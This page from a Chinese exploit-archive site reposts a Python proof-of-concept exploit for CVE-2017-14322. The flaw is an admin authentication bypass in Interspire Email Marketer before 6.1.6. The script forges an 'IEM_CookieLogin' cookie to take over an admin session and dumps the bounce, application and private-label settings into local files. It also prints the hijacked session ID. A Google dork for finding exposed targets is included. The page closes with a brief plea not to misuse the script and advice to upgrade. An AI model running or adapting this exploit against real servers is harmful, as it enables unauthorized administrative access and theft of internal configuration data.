首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass
来源:https://github.com/joesmithjaffa 作者:devcoinfet 发布时间:2018-04-25  
'''
# Exploit Title: Interspire Email Marketer - Remote Admin Authentication Bypass
# Google Dork: intitle:"Control Panel" + emailmarketer
# Date: 4-22-18
# Exploit Author: devcoinfet
# Vendor Homepage: www.interspire.com/emailmarketer
# Software Link: Can't legally provide link but can be found on net
# Version: [6.1.3-6.1.6]
# Tested on: Below 6.1.6
# CVE : CVE-2017-14322
 
https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
https://github.com/joesmithjaffa/CVE-2017-14322
thanks to above Researchers
 
1. Description
 
 
 
this is used like this
--------------------------
exploit.py url/email-marketer/admin/index.php
 
 
2. Proof of Concept
'''
 
 
import requests
import sys
from bs4 import BeautifulSoup
from pprint import pprint
 
 
def cookie_cutter(url):
    with requests.Session() as s:
       s.get(url)
       r = s.get(url)
       response_regex = r.text
       print("requesting initial Cookie\n")
       print(str(r.headers)+"\n")
       
       for key,value in s.cookies.items():
           if key and "IEMSESSIONID" in key:
          
              s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
       print("Attempting To Posion 2nd request with Forged Cookie\n")
       print("-" * 25)
       r = s.get(url)
       response_regex2 = r.text
       print response_regex2
       print(str(r.headers) + "\n")
       if response_regex != response_regex2:
 
          for key,value in s.cookies.items():
              if "IEMSESSIONID" in key:
                 try:
                    #using session riding from previous cookie we grab the info we want :)
                    bounce_info_grab(url,value)
                    app_info_grab(url,value)
                    privt_info_grab(url,value)
                 except:
                     pass
                 return value,r.text
 
 
def bounce_info_grab(url,session_to_ride):
    url_grab = url+"?Page=Settings&Tab=2"
    print(url_grab)
    with requests.Session() as s:
       s.get(url_grab)
       s.cookies.set('IEMSESSIONID',session_to_ride)
       r = s.get(url_grab)
       response_regex = r.text
       soup = BeautifulSoup(response_regex,'html5lib')
       div = soup.find('div', id='div7')
      
        
       outfile = open("bounce_report.txt",'w')
       dataout = """<html><head>Report</head><title>Report</title>
                    <body>""" + str(div) +"""</body></html>"""
       outfile.write(dataout)
       outfile.close()
       for divy in div.contents:
           print(divy)
          
def app_info_grab(url,session_to_ride):
    url_grab = url+"?Page=Settings&Tab=2"
    print(url_grab)
    with requests.Session() as s:
       s.get(url_grab)
       s.cookies.set('IEMSESSIONID',session_to_ride)
       r = s.get(url_grab)
       response_regex = r.text
       soup = BeautifulSoup(response_regex,'html5lib')
       div = soup.find('div', id='div1')
    
        
       outfile = open("application_settings_report.txt",'w')
       dataout = """<html><head>Report</head><title>Report</title>
                    <body>""" + str(div) +"""</body></html>"""
       outfile.write(dataout)
       outfile.close()
       for divy in div.contents:
           print(divy)  
    
def privt_info_grab(url,session_to_ride):
    url_grab = url+"?Page=Settings&Tab=2"
    print(url_grab)
    with requests.Session() as s:
       s.get(url_grab)
       s.cookies.set('IEMSESSIONID',session_to_ride)
       r = s.get(url_grab)
       response_regex = r.text
       soup = BeautifulSoup(response_regex,'html5lib')
       div = soup.find('div', id='div8')
     
        
       outfile = open("privtlbl_settings_report.txt",'w')
       dataout = """<html><head>Report</head><title>Report</title>
                    <body>""" + str(div) +"""</body></html>"""
       outfile.write(dataout)
       outfile.close()
       for divy in div.contents:
           print(divy)  
    
def main():
    url = sys.argv[1]
    print  "Evaluating Target:" +url+ """ For CVE-2017-14322"""+"\n"
    print "-" * 25
    try:
       session_rider_value,content = cookie_cutter(url)
       print "Session Has Been Generated Entering Internal Data Dumping Routine"+"\n"
       print "-" * 25
       print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
       print "-" * 25
       print  session_rider_value+"\n"
       print "-" * 25
    except:
       print "Target Is Not Vulnerable"
       pass
   
    
 
main()
 
'''
When Running this, if it is succesful check for 3 files in the directory of exploit to find crucial internal configs in Html format
do not use this for bad just dont do it please.
 
 
3. Solution:
   
Update to version 6.1.6 atleast
http://www.interspire.com/emailmarketer
'''
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·PRTG Network Monitor < 18.1.39
·VLC Media Player/Kodi/PopcornT
·Apache CouchDB 1.7.0 and 2.x b
·Kaspersky KSN Remote Code Exec
·lastore-daemon D-Bus Privilege
·ASUS infosvr Authentication By
·Chrome V8 JIT NodeProperties::
·Microsoft Internet Explorer 11
·VX Search 10.6.18 - 'directory
·Lutron Quantum 2.0 - 3.2.243 -
·Easy File Sharing Web Server 7
·Drupal < 8.3.9 / < 8.4.6 / < 8
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved